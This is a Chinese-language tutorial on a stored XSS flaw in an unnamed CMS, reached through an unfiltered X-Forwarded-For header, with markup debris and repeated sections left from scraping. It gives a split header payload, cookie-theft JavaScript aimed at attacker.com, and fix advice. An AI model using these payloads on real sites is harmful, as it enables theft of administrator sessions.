某CMS前台储存型XSS漏洞分析与利用教学<\/h1>

漏洞概述<\/h2>
该漏洞存在于某CMS系统中，是一个前台储存型跨站脚本(XSS)漏洞，攻击者可以通过控制HTTP头中的`X-Forwarded-For<\/code>字段注入恶意JavaScript代码，当管理员查看评论时触发执行。<\/p>`

漏洞分析<\/h2>
漏洞位置<\/h3>
主要漏洞文件：<\/p>

\/4.1.190209\/Lib\/Lib\/Action\/Home\/ForumAction.class.php<\/code><\/li>
\/Lib\/Lib\/Model\/ForumModel.class.php<\/code><\/li>
\/Lib\/Common\/common.php<\/code><\/li>
<\/ul>
漏洞流程<\/h3>


数据接收与处理<\/strong>：<\/p>

系统通过ForumAction.class.php<\/code>中的update()<\/code>方法接收POST数据<\/li>
forum_cookie<\/code>字段由多个ID参数经MD5加密生成<\/li>
当forum_sid<\/code>为24时，取消验证机制<\/li>
<\/ul>
<\/li>

数据库写入<\/strong>：<\/p>

调用D("Forum")->ff_update($post)<\/code>方法写入数据库<\/li>
ForumModel<\/code>继承RelationModel<\/code>，会验证传入数据<\/li>
<\/ul>
<\/li>

漏洞根源<\/strong>：<\/p>

在ForumModel<\/code>中，forum_ip<\/code>字段通过get_client_ip()<\/code>函数获取<\/li>
get_client_ip()<\/code>函数位于\/Lib\/Common\/common.php<\/code>中<\/li>
该函数从多个HTTP头获取IP地址，包括HTTP_X_FORWARDED_FOR<\/code><\/li>
未对获取的IP地址进行任何过滤或验证<\/li>
<\/ul>
<\/li>
<\/ol>
关键代码分析<\/h3>
\/\/ 获取客户端IP的函数
<\/span><\/span><\/span><\/span>function<\/span> get_client_ip<\/span>(){
<\/span><\/span>   if<\/span> (getenv<\/span>("HTTP_CLIENT_IP"<\/span>) &&<\/span> strcasecmp<\/span>(getenv<\/span>("HTTP_CLIENT_IP"<\/span>), "unknown"<\/span>))
<\/span><\/span>       $ip =<\/span> getenv<\/span>("HTTP_CLIENT_IP"<\/span>);
<\/span><\/span>   else<\/span> if<\/span> (getenv<\/span>("HTTP_X_FORWARDED_FOR"<\/span>) &&<\/span> strcasecmp<\/span>(getenv<\/span>("HTTP_X_FORWARDED_FOR"<\/span>), "unknown"<\/span>))
<\/span><\/span>       $ip =<\/span> getenv<\/span>("HTTP_X_FORWARDED_FOR"<\/span>);
<\/span><\/span>   else<\/span> if<\/span> (getenv<\/span>("REMOTE_ADDR"<\/span>) &&<\/span> strcasecmp<\/span>(getenv<\/span>("REMOTE_ADDR"<\/span>), "unknown"<\/span>))
<\/span><\/span>       $ip =<\/span> getenv<\/span>("REMOTE_ADDR"<\/span>);
<\/span><\/span>   else<\/span> if<\/span> (isset<\/span>($_SERVER['REMOTE_ADDR'<\/span>]) &&<\/span> $_SERVER['REMOTE_ADDR'<\/span>] &&<\/span> strcasecmp<\/span>($_SERVER['REMOTE_ADDR'<\/span>], "unknown"<\/span>))
<\/span><\/span>       $ip =<\/span> $_SERVER['REMOTE_ADDR'<\/span>];
<\/span><\/span>   else<\/span>
<\/span><\/span>       $ip =<\/span> "unknown"<\/span>;
<\/span><\/span>   return<\/span>($ip);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
利用条件<\/h3>

注册一个普通用户账号<\/li>
能够提交评论或留言<\/li>
<\/ol>
利用步骤<\/h3>


登录系统<\/strong>：使用注册的普通用户账号登录<\/p>
<\/li>

提交恶意评论<\/strong>：<\/p>

进入留言或评论页面<\/li>
提交任意内容（内容本身不重要）<\/li>
使用Burp Suite等工具拦截提交的数据包<\/li>
<\/ul>
<\/li>

构造XSS Payload<\/strong>：<\/p>

在HTTP头中添加X-Forwarded-For<\/code>字段<\/li>
由于IP字段有长度限制（约20字符），需要分段注入：
*\/<\/script><!--
*\/alert(1);\/*
<script>\/*
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

分段提交<\/strong>：<\/p>

第一次提交：X-Forwarded-For: *\/<\/script><!--<\/code><\/li>
第二次提交：X-Forwarded-For: *\/alert(1);\/*<\/code><\/li>
第三次提交：X-Forwarded-For: <script>\/*<\/code><\/li>
<\/ul>
<\/li>

触发漏洞<\/strong>：<\/p>

当管理员查看评论时，注入的JavaScript代码会执行<\/li>
示例中会弹出alert(1)<\/code>对话框<\/li>
<\/ul>
<\/li>
<\/ol>
高级利用<\/h3>


窃取Cookie<\/strong>：<\/p>

可以构造更复杂的JavaScript代码窃取管理员Cookie<\/li>
示例：
var<\/span> img<\/span> =<\/span> new<\/span> Image<\/span>();
<\/span><\/span>img<\/span>.src<\/span> =<\/span> "http:\/\/attacker.com\/steal.php?cookie="<\/span> +<\/span> encodeURIComponent(document.cookie<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

绕过长度限制<\/strong>：<\/p>

使用JavaScript字符串拼接技术<\/li>
创建DOM元素动态执行代码<\/li>
<\/ul>
<\/li>
<\/ol>
修复建议<\/h2>


输入过滤<\/strong>：<\/p>

在get_client_ip()<\/code>函数中对获取的IP地址进行严格过滤<\/li>
只允许数字和点号（IPv4）或合法的IPv6格式<\/li>
<\/ul>
<\/li>

输出编码<\/strong>：<\/p>

在显示IP地址的地方进行HTML实体编码<\/li>
<\/ul>
<\/li>

长度限制<\/strong>：<\/p>

对IP地址字段设置合理的长度限制<\/li>
<\/ul>
<\/li>

验证机制<\/strong>：<\/p>

不要轻易取消验证机制（如forum_sid == 24<\/code>时的操作）<\/li>
<\/ul>
<\/li>

使用安全函数<\/strong>：<\/p>

使用框架提供的安全函数获取和过滤输入<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了未经验证的用户输入如何导致XSS攻击，特别是通过不太明显的HTTP头字段。开发人员应始终对所有用户输入（包括HTTP头）进行严格验证和过滤，无论这些输入看似多么可信。对于安全关键系统，应考虑实施内容安全策略(CSP)等额外防护措施。<\/p>

某CMS前台储存型XSS漏洞分析与利用教学<\/h1>

漏洞概述<\/h2> 该漏洞存在于某CMS系统中，是一个前台储存型跨站脚本(XSS)漏洞，攻击者可以通过控制HTTP头中的X-Forwarded-For<\/code>字段注入恶意JavaScript代码，当管理员查看评论时触发执行。<\/p>

漏洞利用<\/h2>

漏洞概述<\/h2>
该漏洞存在于某CMS系统中，是一个前台储存型跨站脚本(XSS)漏洞，攻击者可以通过控制HTTP头中的`X-Forwarded-For<\/code>字段注入恶意JavaScript代码，当管理员查看评论时触发执行。<\/p>`